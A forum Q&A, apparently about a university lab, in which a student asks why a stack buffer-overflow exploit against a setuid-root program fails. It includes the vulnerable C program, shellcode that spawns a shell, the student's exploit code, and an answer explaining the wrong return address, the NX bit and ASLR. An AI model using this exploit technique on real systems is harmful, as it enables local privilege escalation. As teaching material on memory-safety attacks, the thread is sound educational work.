Buffer Vulnerability Problems - Generate Shell

Question

I have a lab assignment that I am stuck on. I have to take advantage of a buffer overflow to generate a shell that has root privileges. There's two separate C files: stack.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
 {
char buffer[24];
strcpy(buffer,str);
return 1;
}

int main(int argc, char* argv[])
{
char str[517];

FILE *badfile;
badfile = fopen("badfile","r");

fread(str, sizeof(char),517, badfile);
bof(str);

printf("Returned Properly\n");
return 1;
}

and exploit.c:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"              /* xorl    %eax,%eax              */
"\x50"                  /* pushl   %eax                   */
"\x68""//sh"            /* pushl   $0x68732f2f            */
"\x68""/bin"            /* pushl   $0x6e69622f            */
"\x89\xe3"              /* movl    %esp,%ebx              */
"\x50"                  /* pushl   %eax                   */
"\x53"                  /* pushl   %ebx                   */
"\x89\xe1"              /* movl    %esp,%ecx              */
"\x99"                  /* cdql                           */
"\xb0\x0b"              /* movb    $0x0b,%al              */    
"\xcd\x80"              /* int     $0x80                  */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

I can only edit exploit.c. Here's the edits I have made:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"              /* xorl    %eax,%eax              */
"\x50"                  /* pushl   %eax                   */
"\x68""//sh"            /* pushl   $0x68732f2f            */
"\x68""/bin"            /* pushl   $0x6e69622f            */
"\x89\xe3"              /* movl    %esp,%ebx              */
"\x50"                  /* pushl   %eax                   */
"\x53"                  /* pushl   %ebx                   */
"\x89\xe1"              /* movl    %esp,%ecx              */
"\x99"                  /* cdql                           */
"\xb0\x0b"              /* movb    $0x0b,%al              */    
"\xcd\x80"              /* int     $0x80                  */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(&buffer[486], shellcode);
long *ptr = (long *)(buffer+36);
*ptr = &shellcode;
buffer[sizeof(buffer)-1] = '\0';
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

The commands I use to implement this are:

$ su root
$ Password (enter root password)
# gcc -o stack -fno-stack-protector stack.c
# chmod 4755 stack
# exit
$ gcc -o exploit exploit.c
$./exploit
$./stack

This should replace the return address to be one with the shell when I call stack. Exploit compiles and runs just fine, but when I get to stack, it does a segmentation fault. I know it reads in the file and assigns all the values, but I don't know why it doesn't get redirected to the shellcode when it hits that address. Does anyone know why it might not be generating the shell?

Answer 1

I just point out some important thing about this lab assignment.

First, You have to know what vulnerability you used.

shellcode

strcpy(&buffer[486], shellcode);
long *ptr = (long *)(buffer+36);
*ptr = &shellcode;
buffer[sizeof(buffer)-1] = '\0';

In this code you want to change the return address of your shellcode But the shellcode address is on the stack, the return address you fill in here is the address of global variable called "shellcode", not actually the address on the stack.

And If you want to return to your shellcode, you have to disable the NX bit. Because the shellcode address is on the stack, the stack memory areas is non-executable.

More information about NX bit you could find here: https://en.wikipedia.org/wiki/NX_bit

You have to compile your stack.c with following options

gcc -o stack -fno-stack-protector -z execstack stack.c

You could check your program protection with this tool called checksec. Sorry me reputation is too low to post more than 2 links. Please goolgle checksec. And you have to conquer ASLR protection. One way is to set the shellcode to the global variable in stack.c. And the address of global variable is fixed.

More information about ASLR you could find here: https://en.wikipedia.org/wiki/Address_space_layout_randomization

If you still stuck in it, welcome to ask me.